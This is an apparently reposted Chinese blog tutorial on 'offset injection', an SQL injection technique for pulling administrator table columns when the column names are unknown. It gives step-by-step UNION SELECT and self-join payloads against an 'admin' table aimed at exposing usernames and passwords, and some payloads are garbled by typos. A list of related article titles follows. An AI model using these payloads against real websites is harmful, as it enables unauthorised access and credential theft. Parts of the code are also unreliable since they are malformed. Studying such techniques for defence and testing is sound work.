渗透————偏移注入
来源:互联网 发布:学信网35g数据库 下载 编辑:程序博客网 时间:2024/05/21 05:17
偏移注入:在注入过程中,可能会遇到注入知道表名,但是不知道列名,从而无法继续猜解,此时需要偏移注入解决。
偏移注入的流程:
1,判断字段数。例如:order by 猜字段数为22
2,判断表名。例如:union select 1,2,,,22 from admin (联合查询爆显位)
3,开始偏移注入。
union select 1,2,,,,,,21 * from admin //判断管理表的字段数,逐步测试直到显示正常为止,如到16时返回正常,则证明管理表里面有6个字段
union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b ona.id=b.id) //admin为表a与表b,每个表6个字段
union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as bon a.id=b.id) inner join admin as c on a.id=c.id) //如果上述没爆到关键信息,则继续执行二级偏移注入查询。
偏移注入需要注意的几个点:管理表的字段数越少(一般三个username、id、password)、知道的管理表字段越多我们就越容易成功。
- 渗透————偏移注入
- web渗透—SQL注入思路
- web渗透——SQL注入漏洞攻击步骤
- Firefox渗透插件—Web渗透必备工具
- Firefox渗透插件—Web渗透必备工具
- web渗透—wireshark过滤
- web渗透—xss攻击
- OpenGL入门13——多边形偏移
- PS 滤镜— —图像偏移
- JavaScript基础—计算鼠标偏移量
- 渗透————sqlmap
- 菜鸟也来学渗透——MySql暴库
- 00.初识黑客——渗透概述
- 域渗透——Security Support Provider
- 域渗透——Hook PasswordChangeNotify
- 域渗透——Pass The Ticket
- 域渗透——Skeleton Key
- 域渗透——Security Support Provider
- Android Studion的Monitor中显示No Debuggable Application的解决方法
- I2C之知(四)--I2C总线的7bit从机地址
- NOTE: Color Map Optimization for 3D Reconstruction with Consumer Depth Cameras
- Mysql几种日志简介
- GridView/ListView禁止上下滑动(无需重写view)
- 渗透————偏移注入
- I2C之知(五)--I2C总线的10bit地址以及通用广播地址
- Flask-SQLAlchemy使用方式
- Jekyll发布文章+评论模块
- jquery 简单颜色猜字小游戏
- W311M2 ubuntu安装驱动
- 【SSH】SSH框架(一)——宏观介绍
- 先定一个运维小目标,比方监控它10000台主机
- Mysql表名不区分大小写设置